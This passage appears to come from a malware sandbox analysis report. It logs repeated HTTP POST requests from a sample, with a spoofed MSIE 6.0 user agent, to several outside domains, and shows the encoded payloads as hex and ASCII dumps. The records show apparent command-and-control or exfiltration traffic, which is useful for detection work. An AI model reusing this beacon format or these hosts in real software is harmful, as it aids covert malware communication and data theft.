kt8zWXz1msiZFnEtJ9I4Iw/K9DwU2PBlcObdgZgHp0RrXwT7ayLu516DKUYdGYVAKpLBfKqeGTVpIBDHZpWFGNtypolH/Q3mdjpKA9PHNSkWV5hshPqEYtPt4CQuDZ2f4EU3T4zhBu+2JEQ5vDM8n+j/s3WlMew/9w5U+MP/hUcSacHFqO1tM5Cdq19w2ltRH1eOvmzW6MBYH6vVMR6E6MdfeDxIRPyYdmUGbUI85rdiXsfZ2nsVA3x1pnDDtNlKui3G/LWp+gSKl0xRe9BH+wdn15AsupRGghnnsPtlnkt6J5uZmkvEPxUFHTwrhDr2S9impfkqeKja+h59DR6HdnUnYzmgXFHQCG3T6lUk8ZwKA3jyFFHuuahsnNdLhF+c/TLqjP6dzuKW5rkLHUfsEcGO26PsA1nWqk9vEmfn80JUIVFpsHaXNDpw1gYMu1pnueE9L0mKCwTmHA0f460NXQ2OMi9WtVjb1fGaLvXlWOqBLSrZqR6mDSy+DmJ2CgPr/wZh8X3cV0jpmSDKSw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 2f 61 36 7a 52 57 73 53 65 63 69 48 52 56 41 70 51 6f 52 65 64 4e 54 48 51 38 59 78 74 58 2b 67 7a 2b 71 2b 37 73 44 30 35 48 75 66 6e 51 54 73 4b 67 37 58 35 49 52 78 73 32 4f 75 71 37 66 76 71 33 63 70 5a 51 61 36 63 6c 32 64 2f 2b 33 39 59 56 48 58 48 53 47 30 62 6b 46 33 43 5a 67 74 35 44 48 76 55 39 4f 43 47 46 37 45 34 4d 4a 55 4d 61 65 49 70 62 39 6f 6e 30 2f 7a 34 4f 71 4f 43 71 43 79 70 56 33 55 4d 37 45 7a 78 30 4d 32 4c 70 4d 34 72 66 54 50 7a 53 68 79 72 51 4e 6f 44 75 2b 72 73 59 48 52 76 76 6f 57 45 4a 52 6d 63 4c 47 49 43 59 42 33 4a 66 48 4b 58 53 4a 72 4c 6c 58 6a 48 4a 61 79 66 47 62 32 30 34 65 50 34 6d 4c 61 52 52 76 6a 49 4c 54 73 36 4a 39 45 36 38 46 35 4d 64 69 2f 49 50 58 46 5a 70 35 70 4a 2f 35 32 72 37 45 49 31 48 35 66 48 75 4c 47 76 58 76 36 56 37 4a 39 38 4b 46 76 2b 66 52 64 2f 73 32 65 64 46 47 4e 55 6f 65 6d 71 58 58 76 2f 43 4f 56 72 42 52 72 6a 70 47 42 32 4b 4a 4e 4f 54 6d 57 76 35 38 61 51 2b 50 75 63 6e 6b 6a 6f 65 58 72 7a 43 51 52 47 79 64 42 39 61 63 6f 68 52 5a 58 6a 6c 76 7a 4c 5a 2f 79 37 31 77 32 59 2f 36 42 75 65 54 75 31 54 53 2f 65 5a 6d 51 50 38 63 75 39 69 2b 76 79 39 39 51 6e 41 72 34 73 38 4d 66 78 79 57 6f 55 68 77 49 76 56 48 4c 4e 33 62 4e 39 49 37 67 4b 74 51 31 51 30 79 7a 56 62 66 48 36 51 48 58 50 2b 72 36 4f 69 52 5a 77 64 50 30 35 4f 73 53 73 47 79 68 63 2b 6b 52 34 79 67 72 46 6f 31 58 4f 31 57 52 38 4c 47 37 4b 64 63 49 76 4c 67 73 34 62 4f 47 62 66 37 70 4c 65 65 70 5a 34 38 61 6f 6c 34 72 65 6a 62 43 67 64 36 51 38 6f 4f 32 72 5a 71 46 59 5a 4b 71 70 76 48 65 6b 6b 48 33 6b 5a 51 6f 4b 64 6e 32 79 6b 53 65 Data Ascii: /a6zRWsSeciHRVApQoRedNTHQ8YxtX+gz+q+7sD05HufnQTsKg7X5IRxs2Ouq7fvq3cpZQa6cl2d/+39YVHXHSG0bkF3CZgt5DHvU9OCGF7E4MJUMaeIpb9on0/z4OqOCqCypV3UM7Ezx0M2LpM4rfTPzShyrQNoDu+rsYHRvvoWEJRmcLGICYB3JfHKXSJrLlXjHJayfGb204eP4mLaRRvjILTs6J9E68F5Mdi/IPXFZp5pJ/52r7EI1H5fHuLGvXv6V7J98KFv+fRd/s2edFGNUoemqXXv/COVrBRrjpGB2KJNOTmWv58aQ+PucnkjoeXrzCQRGydB9acohRZXjlvzLZ/y71w2Y/6BueTu1TS/eZmQP8cu9i+vy99QnAr4s8MfxyWoUhwIvVHLN3bN9I7gKtQ1Q0yzVbfH6QHXP+r6OiRZwdP05OsSsGyhc+kR4ygrFo1XO1WR8LG7KdcIvLgs4bOGbf7pLeepZ48aol4rejbCgd6Q8oO2rZqFYZKqpvHekkH3kZQoKdn2ykSe
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=itstfzxkxoxpnauzzfcixwhstikzroxs; _mcnc=1Data Raw: 47 53 76 42 55 37 4d 6e 69 73 68 37 43 67 49 6e 2b 6b 6d 2f 56 31 79 77 38 42 51 5a 65 4d 36 65 6c 2f 43 6e 2b 52 39 4f 52 51 66 2b 78 56 34 42 2b 49 46 4b 2f 6c 66 36 67 57 74 62 36 4c 54 34 35 57 5a 68 62 47 4f 61 48 59 79 4e 47 4a 48 71 4b 2f 76 62 37 53 68 72 39 62 58 71 47 66 44 73 53 4f 64 31 32 56 51 6f 55 6d 66 59 6a 33 46 46 79 53 6f 75 50 44 44 62 76 53 53 35 72 73 4a 30 76 66 6a 30 4b 53 51 54 64 46 32 68 38 6f 38 52 74 64 6a 6a 50 5a 42 74 42 35 71 71 53 6a 64 32 66 6c 63 67 44 4c 61 45 32 58 4e 48 4b 47 4b 48 6c 2f 64 55 73 67 50 43 75 62 49 64 33 74 2f 47 52 47 77 73 45 7a 39 78 51 6f 50 38 30 52 57 6d 35 6d 4b 39 4f 51 56 63 36 70 6c 4a 32 78 79 2f 75 78 5a 69 69 68 66 31 6e 35 50 59 5a 53 33 49 66 73 41 2b 42 67 6a 55 72 32 34 78 56 72 62 4f 79 73 6d 2f 68 48 4b 69 72 34 6d 46 47 57 54 6e 49 4f 69 62 63 46 4a 31 77 4b 61 4c 47 70 55 57 41 4e 31 62 4b 74 4e 30 62 6d 5a 53 77 51 2f 72 55 44 7a 6f 4f 4f 56 4a 4d 65 74 45 69 39 46 2f 53 36 6b 49 42 6c 69 34 64 7a 7a 69 58 77 54 74 2b 2b 2b 55 5a 54 33 6a 46 72 55 6b 42 6f 51 48 2f 4d 6c 2f 34 2f 4f 67 70 70 55 76 4b 62 2f 69 73 52 7a 34 51 4d 46 62 7a 45 46 4c 51 46 59 65 32 30 56 46 58 35 47 70 66 6f 38 44 71 50 65 31 7a 39 62 4d 66 46 33 2b 72 75 6a 30 79 6e 71 35 4f 55 36 73 47 69 44 43 58 73 47 73 6d 4f 56 53 7a 62 4c 64 41 34 41 54 6f 78 61 46 41 38 73 68 65 59 71 6e 43 53 55 39 69 49 64 6b 36 5a 54 71 56 7a 76 70 6f 76 33 7a 77 33 36 6b 6d 53 4c 36 67 7a 71 34 52 31 71 32 64 64 6d 47 35 58 69 4d 30 48 4c 4d 65 42 39 43 74 44 6e 2f 5a 2f 65 48 4c 70 48 46 6c 63 76 51 2f 63 34 6b 47 35 4a 48 37 47 4c 62 2b 48 67 3d Data Ascii: GSvBU7Mnish7CgIn+km/V1yw8BQZeM6el/Cn+R9ORQf+xV4B+IFK/lf6gWtb6LT45WZhbGOaHYyNGJHqK/vb7Shr9bXqGfDsSOd12VQoUmfYj3FFySouPDDbvSS5rsJ0vfj0KSQTdF2h8o8RtdjjPZBtB5qqSjd2flcgDLaE2XNHKGKHl/dUsgPCubId3t/GRGwsEz9xQoP80RWm5mK9OQVc6plJ2xy/uxZiihf1n5PYZS3IfsA+BgjUr24xVrbOysm/hHKir4mFGWTnIOibcFJ1wKaLGpUWAN1bKtN0bmZSwQ/rUDzoOOVJMetEi9F/S6kIBli4dzziXwTt+++UZT3jFrUkBoQH/Ml/4/OgppUvKb/isRz4QMFbzEFLQFYe20VFX5Gpfo8DqPe1z9bMfF3+ruj0ynq5OU6sGiDCXsGsmOVSzbLdA4AToxaFA8sheYqnCSU9iIdk6ZTqVzvpov3zw36kmSL6gzq4R1q2ddmG5XiM0HLMeB9CtDn/Z/eHLpHFlcvQ/c4kG5JH7GLb+Hg=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 76 48 58 67 6e 73 41 34 6e 63 6a 73 4d 2f 69 62 6b 31 58 48 6d 2f 4f 64 66 2b 47 6f 46 6b 59 6f 39 42 50 37 76 47 59 6d 6a 51 62 37 62 73 64 67 50 56 39 59 37 6a 46 72 43 6c 76 48 77 45 7a 31 44 66 49 2b 2f 79 2b 36 64 46 4c 4b 68 70 57 49 70 61 41 36 58 4f 6e 69 66 70 59 6d 35 34 31 6b 69 6c 70 38 47 72 48 43 56 4e 71 62 4d 63 4b 68 67 31 71 35 57 45 7a 79 5a 33 55 56 4b 53 68 51 48 50 34 36 46 65 6d 4c 74 6b 43 63 72 35 37 37 63 6b 6f 48 63 5a 57 4c 6c 63 5a 63 45 38 43 65 38 65 37 39 6e 64 72 5a 38 30 37 62 34 4a 2b 41 6f 4c 32 69 32 31 30 34 45 41 38 31 55 34 4e 30 73 31 68 33 49 4b 6d 55 48 39 43 44 48 4e 57 51 49 41 57 67 41 71 4d 64 41 52 77 31 59 68 37 37 41 68 50 79 61 34 4b 57 48 68 48 76 6b 59 2b 55 65 34 48 67 50 49 4f 75 35 59 61 68 7a 6d 56 77 57 32 78 49 4b 67 75 37 59 46 57 68 46 38 36 34 4d 6c 34 4b 68 75 4c 58 42 55 48 44 64 2b 57 42 74 65 41 42 33 59 4b 67 41 48 70 51 72 31 78 34 62 38 4c 61 66 39 2b 62 2b 42 5a 32 70 4f 58 35 57 72 4f 68 6c 4a 6b 31 49 7a 76 73 72 6b 5a 67 6c 4d 67 6d 73 69 71 52 74 68 36 79 39 38 55 64 45 62 70 71 50 58 76 75 54 56 6d 49 4c 73 67 76 50 4a 61 2f 68 4d 65 63 6a 30 2f 51 61 4d 61 72 61 68 43 48 6b 4d 68 54 34 46 52 58 62 4e 69 39 75 46 53 61 31 57 78 36 70 62 73 79 57 6b 73 78 75 4d 75 58 7a 39 6e 6c 6d 2f 38 67 32 4d 35 59 58 30 4e 49 5a 68 79 67 59 46 47 6c 76 4f 71 33 50 6c 32 55 63 42 77 52 4d 4e 4f 6f 32 43 4b 53 37 74 4b 4c 6d 77 37 2b 77 45 65 68 79 6a 74 52 4f 48 61 46 75 6e 45 4a 39 49 6f 78 4d 38 6e 4c 65 4e 4d 6b 73 4a 63 68 49 71 61 56 38 5a 63 69 69 62 42 62 37 72 4a 5a 69 33 65 2b 55 57 6f 76 4c 6e 67 39 6c 57 75 6b Data Ascii: vHXgnsA4ncjsM/ibk1XHm/Odf+GoFkYo9BP7vGYmjQb7bsdgPV9Y7jFrClvHwEz1DfI+/y+6dFLKhpWIpaA6XOnifpYm541kilp8GrHCVNqbMcKhg1q5WEzyZ3UVKShQHP46FemLtkCcr577ckoHcZWLlcZcE8Ce8e79ndrZ807b4J+AoL2i2104EA81U4N0s1h3IKmUH9CDHNWQIAWgAqMdARw1Yh77AhPya4KWHhHvkY+Ue4HgPIOu5YahzmVwW2xIKgu7YFWhF864Ml4KhuLXBUHDd+WBteAB3YKgAHpQr1x4b8Laf9+b+BZ2pOX5WrOhlJk1IzvsrkZglMgmsiqRth6y98UdEbpqPXvuTVmILsgvPJa/hMecj0/QaMarahCHkMhT4FRXbNi9uFSa1Wx6pbsyWksxuMuXz9nlm/8g2M5YX0NIZhygYFGlvOq3Pl2UcBwRMNOo2CKS7tKLmw7+wEehyjtROHaFunEJ9IoxM8nLeNMksJchIqaV8ZciibBb7rJZi3e+UWovLng9lWuk
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 6d 49 64 63 57 63 76 32 6d 73 68 5a 58 76 63 62 49 6c 31 31 52 44 51 4c 74 70 38 52 34 59 58 47 4c 2b 31 6a 36 4d 6b 34 61 4d 4f 56 75 49 32 61 6a 57 4e 4f 61 2b 78 6d 62 38 67 2b 79 47 31 78 63 61 5a 57 73 4e 68 4b 6c 71 76 4a 30 41 71 5a 75 63 59 70 41 54 2f 6c 42 76 63 65 68 46 69 49 48 7a 6c 32 62 62 67 55 61 46 56 61 38 6a 42 57 5a 64 76 53 79 47 50 52 4f 32 4f 6c 63 6c 61 51 39 77 68 61 4c 7a 38 76 63 72 4c 47 69 6c 58 6c 78 66 43 6b 38 74 44 36 66 35 37 65 65 31 41 50 64 6d 49 73 52 35 30 53 33 4a 32 57 41 6b 49 71 50 6c 4f 56 35 59 39 6d 61 39 39 75 4f 72 6a 71 42 56 65 67 66 7a 56 65 6f 34 72 55 48 61 2b 2b 46 71 62 30 34 66 69 62 77 51 71 2f 47 44 45 77 62 48 32 53 54 32 6d 72 46 34 6f 62 6f 45 37 39 75 69 78 45 4f 6a 30 72 61 2f 33 34 5a 54 4e 33 54 4b 41 49 59 6d 51 62 2f 4f 53 34 30 71 6b 38 55 4a 47 4b 62 79 31 6b 47 77 47 63 6b 65 6d 79 69 4d 5a 47 32 48 49 6c 47 44 78 4c 47 32 61 4d 36 6a 78 2f 64 4e 30 39 5a 51 7a 69 69 45 58 6c 54 64 4e 76 66 39 4e 72 6b 55 4e 44 34 79 6a 59 30 44 69 2b 79 79 78 73 5a 78 46 5a 7a 6b 61 6a 6d 46 5a 61 43 44 42 30 72 35 75 41 63 4b 63 49 72 39 62 73 38 44 59 35 79 72 50 47 43 74 69 30 75 59 76 35 56 69 50 59 4f 62 56 76 79 57 51 58 68 6a 53 62 46 73 51 64 61 48 74 4e 55 63 6c 71 35 6e 64 61 52 55 74 48 76 62 43 64 71 7a 58 30 35 76 35 33 38 71 52 57 45 67 43 73 31 6d 77 48 70 52 51 47 68 56 79 61 66 42 68 72 57 52 6d 33 6e 49 31 71 45 46 68 71 57 41 72 7a 78 51 34 50 77 56 4f 56 63 42 62 4e 39 6f 65 5a 59 50 49 71 2b 74 4e 64 59 64 53 41 55 6a 53 61 33 51 32 57 71 4a 4a 4b 4d 44 57 53 4f 73 77 50 64 55 4e 34 74 6a 51 6d Data Ascii: mIdcWcv2mshZXvcbIl11RDQLtp8R4YXGL+1j6Mk4aMOVuI2ajWNOa+xmb8g+yG1xcaZWsNhKlqvJ0AqZucYpAT/lBvcehFiIHzl2bbgUaFVa8jBWZdvSyGPRO2OlclaQ9whaLz8vcrLGilXlxfCk8tD6f57ee1APdmIsR50S3J2WAkIqPlOV5Y9ma99uOrjqBVegfzVeo4rUHa++Fqb04fibwQq/GDEwbH2ST2mrF4oboE79uixEOj0ra/34ZTN3TKAIYmQb/OS40qk8UJGKby1kGwGckemyiMZG2HIlGDxLG2aM6jx/dN09ZQziiEXlTdNvf9NrkUND4yjY0Di+yyxsZxFZzkajmFZaCDB0r5uAcKcIr9bs8DY5yrPGCti0uYv5ViPYObVvyWQXhjSbFsQdaHtNUclq5ndaRUtHvbCdqzX05v538qRWEgCs1mwHpRQGhVyafBhrWRm3nI1qEFhqWArzxQ4PwVOVcBbN9oeZYPIq+tNdYdSAUjSa3Q2WqJJKMDWSOswPdUN4tjQm
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 76 48 58 67 6e 73 41 34 6e 63 6a 73 4d 2f 69 62 6b 31 58 48 6d 2f 4f 64 66 2b 47 6f 46 6b 59 6f 39 42 50 37 76 47 59 6d 6a 51 62 37 62 73 64 67 50 56 39 59 37 6a 46 72 43 6c 76 48 77 45 7a 31 44 66 49 2b 2f 79 2b 36 64 46 4c 4b 68 70 57 49 70 61 41 36 58 4f 6e 69 66 70 59 6d 35 34 31 6b 69 6c 70 38 47 72 48 43 56 4e 71 62 4d 63 4b 68 67 31 71 35 57 45 7a 79 5a 33 55 56 4b 53 68 51 48 50 34 36 46 65 6d 4c 74 6b 43 63 72 35 37 37 63 6b 6f 48 63 5a 57 4c 6c 63 5a 63 45 38 43 65 38 65 37 39 6e 64 72 5a 38 30 37 62 34 4a 2b 41 6f 4c 32 69 32 31 30 34 45 41 38 31 55 34 4e 30 73 31 68 33 49 4b 6d 55 48 39 43 44 48 4e 57 51 49 41 57 67 41 71 4d 64 41 52 77 31 59 68 37 37 41 68 50 79 61 34 4b 57 48 68 48 76 6b 59 2b 55 65 34 48 67 50 49 4f 75 35 59 61 68 7a 6d 56 77 57 32 78 49 4b 67 75 37 59 46 57 68 46 38 36 34 4d 6c 34 4b 68 75 4c 58 42 55 48 44 64 2b 57 42 74 65 41 42 33 59 4b 67 41 48 70 51 72 31 78 34 62 38 4c 61 66 39 2b 62 2b 42 5a 32 70 4f 58 35 57 72 4f 68 6c 4a 6b 31 49 7a 76 73 72 6b 5a 67 6c 4d 67 6d 73 69 71 52 74 68 36 79 39 38 55 64 45 62 70 71 50 58 76 75 54 56 6d 49 4c 73 67 76 50 4a 61 2f 68 4d 65 63 6a 30 2f 51 61 4d 61 72 61 68 43 48 6b 4d 68 54 34 46 52 58 62 4e 69 39 75 46 53 61 31 57 78 36 70 62 73 79 57 6b 73 78 75 4d 75 58 7a 39 6e 6c 6d 2f 38 67 32 4d 35 59 58 30 4e 49 5a 68 79 67 59 46 47 6c 76 4f 71 33 50 6c 32 55 63 42 77 52 4d 4e 4f 6f 32 43 4b 53 37 74 4b 4c 6d 77 37 2b 77 45 65 68 79 6a 74 52 4f 48 61 46 75 6e 45 4a 39 49 6f 78 4d 38 6e 4c 65 4e 4d 6b 73 4a 63 68 49 71 61 56 38 5a 63 69 69 62 42 62 37 72 4a 5a 69 33 65 2b 55 57 6f 76 4c 6e 67 39 6c 57 75 6b Data Ascii: vHXgnsA4ncjsM/ibk1XHm/Odf+GoFkYo9BP7vGYmjQb7bsdgPV9Y7jFrClvHwEz1DfI+/y+6dFLKhpWIpaA6XOnifpYm541kilp8GrHCVNqbMcKhg1q5WEzyZ3UVKShQHP46FemLtkCcr577ckoHcZWLlcZcE8Ce8e79ndrZ807b4J+AoL2i2104EA81U4N0s1h3IKmUH9CDHNWQIAWgAqMdARw1Yh77AhPya4KWHhHvkY+Ue4HgPIOu5YahzmVwW2xIKgu7YFWhF864Ml4KhuLXBUHDd+WBteAB3YKgAHpQr1x4b8Laf9+b+BZ2pOX5WrOhlJk1IzvsrkZglMgmsiqRth6y98UdEbpqPXvuTVmILsgvPJa/hMecj0/QaMarahCHkMhT4FRXbNi9uFSa1Wx6pbsyWksxuMuXz9nlm/8g2M5YX0NIZhygYFGlvOq3Pl2UcBwRMNOo2CKS7tKLmw7+wEehyjtROHaFunEJ9IoxM8nLeNMksJchIqaV8ZciibBb7rJZi3e+UWovLng9lWuk
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 6b 74 38 7a 57 58 7a 31 6d 73 69 5a 46 6e 45 74 4a 39 49 34 49 77 2f 4b 39 44 77 55 32 50 42 6c 63 4f 62 64 67 5a 67 48 70 30 52 72 58 77 54 37 61 79 4c 75 35 31 36 44 4b 55 59 64 47 59 56 41 4b 70 4c 42 66 4b 71 65 47 54 56 70 49 42 44 48 5a 70 57 46 47 4e 74 79 70 6f 6c 48 2f 51 33 6d 64 6a 70 4b 41 39 50 48 4e 53 6b 57 56 35 68 73 68 50 71 45 59 74 50 74 34 43 51 75 44 5a 32 66 34 45 55 33 54 34 7a 68 42 75 2b 32 4a 45 51 35 76 44 4d 38 6e 2b 6a 2f 73 33 57 6c 4d 65 77 2f 39 77 35 55 2b 4d 50 2f 68 55 63 53 61 63 48 46 71 4f 31 74 4d 35 43 64 71 31 39 77 32 6c 74 52 48 31 65 4f 76 6d 7a 57 36 4d 42 59 48 36 76 56 4d 52 36 45 36 4d 64 66 65 44 78 49 52 50 79 59 64 6d 55 47 62 55 49 38 35 72 64 69 58 73 66 5a 32 6e 73 56 41 33 78 31 70 6e 44 44 74 4e 6c 4b 75 69 33 47 2f 4c 57 70 2b 67 53 4b 6c 30 78 52 65 39 42 48 2b 77 64 6e 31 35 41 73 75 70 52 47 67 68 6e 6e 73 50 74 6c 6e 6b 74 36 4a 35 75 5a 6d 6b 76 45 50 78 55 46 48 54 77 72 68 44 72 32 53 39 69 6d 70 66 6b 71 65 4b 6a 61 2b 68 35 39 44 52 36 48 64 6e 55 6e 59 7a 6d 67 58 46 48 51 43 47 33 54 36 6c 55 6b 38 5a 77 4b 41 33 6a 79 46 46 48 75 75 61 68 73 6e 4e 64 4c 68 46 2b 63 2f 54 4c 71 6a 50 36 64 7a 75 4b 57 35 72 6b 4c 48 55 66 73 45 63 47 4f 32 36 50 73 41 31 6e 57 71 6b 39 76 45 6d 66 6e 38 30 4a 55 49 56 46 70 73 48 61 58 4e 44 70 77 31 67 59 4d 75 31 70 6e 75 65 45 39 4c 30 6d 4b 43 77 54 6d 48 41 30 66 34 36 30 4e 58 51 32 4f 4d 69 39 57 74 56 6a 62 31 66 47 61 4c 76 58 6c 57 4f 71 42 4c 53 72 5a 71 52 36 6d 44 53 79 2b 44 6d 4a 32 43 67 50 72 2f 77 5a 68 38 58 33 63 56 30 6a 70 6d 53 44 4b 53 77 3d 3d Data Ascii: kt8zWXz1msiZFnEtJ9I4Iw/K9DwU2PBlcObdgZgHp0RrXwT7ayLu516DKUYdGYVAKpLBfKqeGTVpIBDHZpWFGNtypolH/Q3mdjpKA9PHNSkWV5hshPqEYtPt4CQuDZ2f4EU3T4zhBu+2JEQ5vDM8n+j/s3WlMew/9w5U+MP/hUcSacHFqO1tM5Cdq19w2ltRH1eOvmzW6MBYH6vVMR6E6MdfeDxIRPyYdmUGbUI85rdiXsfZ2nsVA3x1pnDDtNlKui3G/LWp+gSKl0xRe9BH+wdn15AsupRGghnnsPtlnkt6J5uZmkvEPxUFHTwrhDr2S9impfkqeKja+h59DR6HdnUnYzmgXFHQCG3T6lUk8ZwKA3jyFFHuuahsnNdLhF+c/TLqjP6dzuKW5rkLHUfsEcGO26PsA1nWqk9vEmfn80JUIVFpsHaXNDpw1gYMu1pnueE9L0mKCwTmHA0f460NXQ2OMi9WtVjb1fGaLvXlWOqBLSrZqR6mDSy+DmJ2CgPr/wZh8X3cV0jpmSDKSw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 64 2b 50 4f 4e 67 56 34 71 73 6a 57 33 69 37 48 4c 41 6c 6d 45 58 34 79 45 37 66 54 61 79 4c 71 43 58 55 77 44 62 49 4d 4c 55 6f 71 62 4f 74 6c 64 38 30 47 69 73 37 61 45 33 6a 2f 67 6b 43 67 67 43 47 37 2f 7a 71 66 67 74 6c 34 30 49 50 4c 69 54 73 2f 4e 46 39 46 71 70 6a 6f 55 5a 45 69 77 4b 4c 79 6f 71 33 5a 55 48 69 6c 35 50 44 55 2f 67 59 75 52 50 32 66 39 58 62 69 49 53 37 70 35 2b 6d 6d 37 54 6a 58 64 32 4b 32 4a 66 41 73 4d 4e 4a 4c 49 6a 49 77 4c 48 6b 2b 55 57 42 69 2f 35 76 4f 55 5a 43 67 69 42 4d 79 65 46 57 63 42 34 76 6c 47 53 37 4b 4b 6c 4e 69 42 38 41 53 57 71 57 78 37 70 76 41 36 4b 70 6a 44 55 42 33 30 48 57 74 66 61 66 75 4f 4b 73 49 7a 4b 64 56 35 72 4e 46 48 62 37 6f 46 72 36 77 33 48 59 55 64 4f 6c 33 42 4a 74 48 37 67 4a 47 66 7a 72 6c 4b 59 31 72 65 70 43 63 39 71 4b 70 48 31 41 57 51 6f 4e 31 47 6a 70 34 76 64 31 7a 7a 37 78 58 59 34 65 48 6c 4f 50 33 6d 4c 4e 5a 32 30 71 69 63 44 51 36 68 33 59 6c 63 6b 2b 6e 47 37 50 34 31 6f 46 6c 35 59 52 71 35 76 64 74 70 43 58 53 54 44 53 56 43 6d 4b 7a 72 78 52 45 67 54 71 32 77 4b 39 55 37 59 5a 74 6f 66 66 37 45 55 34 36 75 63 2b 54 39 76 6d 37 56 39 68 41 72 42 44 55 42 4d 74 70 33 49 6b 44 75 52 36 66 6f 67 6d 48 51 71 71 30 68 30 43 6e 73 36 59 44 52 48 44 72 37 54 74 6e 46 32 49 61 55 6b 69 78 6d 6a 52 6d 4a 76 74 37 4f 53 6a 2b 4b 5a 64 73 69 44 73 4e 79 6b 65 74 54 73 72 56 70 63 4a 2b 35 37 78 71 4d 55 59 45 51 50 71 62 6e 30 57 47 54 33 53 47 6a 69 59 41 6b 33 4f 6d 76 68 49 4a 78 39 38 55 62 77 46 48 73 34 72 78 2f 4d 33 65 4c 57 75 2b 6a 39 4a 73 76 2b 44 78 51 2f 70 30 74 63 64 37 53 70 74 75 6a 68 46 76 62 72 34 54 6d 74 73 43 57 42 4d 55 4a 42 76 2b 53 57 35 77 63 49 72 4f 6f 4a 73 52 4c 54 63 67 6f 47 54 38 30 4c 59 3d Data Ascii: d+PONgV4qsjW3i7HLAlmEX4yE7fTayLqCXUwDbIMLUoqbOtld80Gis7aE3j/gkCggCG7/zqfgtl40IPLiTs/NF9FqpjoUZEiwKLyoq3ZUHil5PDU/gYuRP2f9XbiIS7p5+mm7TjXd2K2JfAsMNJLIjIwLHk+UWBi/5vOUZCgiBMyeFWcB4vlGS7KKlNiB8ASWqWx7pvA6KpjDUB30HWtfafuOKsIzKdV5rNFHb7oFr6w3HYUdOl3BJtH7gJGfzrlKY1repCc9qKpH1AWQoN1Gjp4vd1zz7xXY4eHlOP3mLNZ20qicDQ6h3Ylck+nG7P41oFl5YRq5vdtpCXSTDSVCmKzrxREgTq2wK9U7YZtoff7EU46uc+T9vm7V9hArBDUBMtp3IkDuR6fogmHQqq0h0Cns6YDRHDr7TtnF2IaUkixmjRmJvt7OSj+KZdsiDsNyketTsrVpcJ+57xqMUYEQPqbn0WGT3SGjiYAk3OmvhIJx98UbwFHs4rx/M3eLWu+j9Jsv+DxQ/p0tcd7SptujhFvbr4TmtsCWBMUJBv+SW5wcIrOoJsRLTcgoGT80LY=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 50 55 64 6c 4e 70 64 30 71 73 6a 4f 46 74 63 75 68 67 6c 4b 75 75 42 6d 78 52 50 4e 30 4a 2b 39 75 7a 6b 59 6a 5a 34 76 38 53 77 31 35 49 53 6c 66 6b 66 6a 5a 4b 53 72 58 43 57 45 46 77 73 55 44 43 35 54 72 62 74 50 36 50 44 58 42 32 34 6f 62 64 4e 7a 32 6d 45 6d 6d 34 4e 63 71 59 4d 37 37 56 38 4e 61 2f 63 57 57 79 2f 6c 62 30 4a 2f 45 53 63 71 4d 46 6a 53 4b 6d 42 34 79 36 6c 57 48 73 35 77 6b 6b 75 6e 49 79 35 70 38 65 48 49 33 68 70 52 53 79 6d 38 79 73 2b 4b 78 64 75 71 4c 4f 65 71 51 4f 67 77 45 69 75 67 67 47 30 6d 69 32 58 31 71 6c 67 76 51 61 39 65 45 49 52 5a 61 39 2f 2f 43 7a 6c 37 44 41 75 33 73 4b 31 30 65 74 46 50 64 78 42 58 4b 46 4e 38 38 76 42 4a 76 74 43 31 44 77 53 33 4d 47 4e 4b 58 59 37 7a 61 35 79 50 57 63 4b 6b 4f 7a 67 4a 52 57 45 31 75 47 57 58 78 76 6c 44 4d 61 43 31 56 4a 4e 61 31 2b 53 62 4a 4e 73 69 32 66 55 31 75 31 74 75 54 57 36 50 2f 65 6a 4d 65 6c 32 4c 6c 50 42 6d 73 79 48 4a 50 33 47 7a 59 2b 4f 56 30 54 48 4e 4b 78 63 32 75 68 4b 36 79 4e 30 4f 64 73 31 70 31 4d 47 53 4f 46 56 6b 71 62 45 6c 76 65 78 53 69 61 39 43 6e 37 39 2b 52 5a 34 45 4b 6e 39 78 30 79 55 31 47 79 39 73 69 69 68 31 46 70 39 7a 70 69 41 7a 74 38 54 59 57 31 32 38 7a 64 4f 6e 59 6a 4e 36 76 76 64 71 76 61 73 42 35 75 6c 7a 4b 52 50 44 6e 55 51 63 6c 53 35 41 73 44 51 50 35 4c 47 2b 30 77 37 66 68 64 6f 75 4e 42 6a 51 63 4e 54 69 5a 63 43 73 63 72 37 70 75 34 33 36 2f 53 30 75 47 33 64 75 4d 35 6a 69 51 65 6a 2b 33 38 7a 34 34 67 35 4c 6b 36 6f 36 41 76 48 56 35 47 42 42 5a 70 39 6f 76 49 6c 62 61 37 47 65 30 66 71 